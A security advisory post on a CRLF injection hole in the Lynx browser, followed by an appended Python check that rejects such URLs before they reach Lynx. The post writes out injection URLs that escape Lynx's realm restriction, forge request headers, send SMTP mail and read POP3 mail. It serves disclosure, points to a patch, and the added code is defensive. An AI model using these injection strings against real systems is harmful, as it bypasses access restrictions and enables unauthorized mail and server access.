Lynx CRLF Injection, part two

This is a follow-up to my "Lynx CRLF Injection" post a few days ago.

* Lynx has a realm feature that restricts users from accessing any host apart from the host of its start page. That is, if you start Lynx with "lynx -realm http://www.site1.st/", you are not allowed to go to http://www.site2.st/ . The CRLF Injection security hole allows users to break out of realms - the command

  $ lynx -realm "http://www.site1.st/ HTTP/1.0
  Host: www.site2.st
  "

  will show site2.st, despite the fact that it is outside of the realm.

* It allows users to send arbitrary cookies, user agents and referers to a web server - even if you're using a restrictions option saying that you're not allowed to change the user agent:

  $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0
  User-Agent: Ulf 0.0
  Referer: http://www.metaur.nu/
  Cookie: user=ulf
  "

* It is also possible to use this hole for communication with other types of servers than HTTP servers. You can send e-mails with it, for example - even if you're using a restrictions option saying that you're not allowed to send e-mails:

  $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0
  HELO my.own.site
  MAIL FROM: <my.own@mail.address>
  RCPT TO: <info@site1.st>
  DATA
  From: my.own@mail.address
  To: info@site1.st
  Subject: This is..

  This is a URL that sends an e-mail (?).
  .
  QUIT
  "

  You have to use port 587, as Lynx blocks port 25. The MTA will complain about the "GET / HTTP/1.0" string, but it still works.

* You can even use this hole for reading e-mails from a POP3 server:

  $ lynx "http://mail.site1.st:110/ HTTP/1.0
  USER ulf
  PASS xxxx
  LIST
  RETR 1
  QUIT
  "

  The POP3 server will also complain about the "GET / HTTP/1.0" string, but it still works with this technique as well.

* As previously noted, the holes listed above mostly affect programs that start Lynx, interactively or not, with a URL wholly or partially under the user's control.
* The patch for this hole has moved to: ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch

// Ulf Harnhammar
ulfh@update.uu.se
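For the programs mentioned in the last point, which start Lynx with a URL partly under the user's control, the check below is an added example of what such a wrapper can do before calling Lynx; it is not part of the post or of Lynx, and the function names, the allowed-port policy and the sample URLs are assumptions. It rejects any literal control character or whitespace (so no second request line or extra header can be smuggled in), requires the URL to stay on the origin of the intended start page, and builds an argv list so the URL is passed to Lynx without going through a shell.

```python
import re
from urllib.parse import urlsplit

# Bytes Lynx would pass verbatim into the request line: CR, LF, the other
# C0 controls, space and DEL. Only literal bytes are checked here.
_UNSAFE = re.compile(r"[\x00-\x20\x7f]")

# Assumed policy: plain web ports only, so a caller-supplied URL cannot be
# aimed at an SMTP submission (587) or POP3 (110) listener.
DEFAULT_PORTS = frozenset({80, 443})

def _origin(url):
    """(scheme, host, port) of an absolute http(s) URL, or None."""
    p = urlsplit(url)
    if p.scheme not in ("http", "https") or not p.hostname:
        return None
    try:
        port = p.port or (443 if p.scheme == "https" else 80)
    except ValueError:  # non-numeric or out-of-range port
        return None
    return (p.scheme, p.hostname, port)

def check_lynx_url(url, realm=None, allowed_ports=DEFAULT_PORTS):
    """Return None if `url` may be handed to Lynx, else why it may not.
    `realm` is the start page whose origin the URL must stay within."""
    if _UNSAFE.search(url):
        return "control character or whitespace in URL"
    origin = _origin(url)
    if origin is None:
        return "not a well-formed absolute http(s) URL"
    if origin[2] not in allowed_ports:
        return "port %d not allowed" % origin[2]
    if realm is not None and origin != _origin(realm):
        return "URL is outside the realm of %s" % realm
    return None

def build_lynx_argv(url, realm=None):
    """argv for subprocess.run(..., shell=False): one argument per item, so
    the URL is never re-parsed by a shell. Raises ValueError when unsafe."""
    reason = check_lynx_url(url, realm)
    if reason:
        raise ValueError(reason)
    argv = ["lynx"]
    if realm is not None:
        argv.append("-realm")
    argv.append(url)
    return argv
```

With the realm-escape URL from the first point, check_lynx_url() returns "control character or whitespace in URL" and build_lynx_argv() raises instead of starting Lynx; a plain page URL on the same host passes and yields ["lynx", "-realm", url].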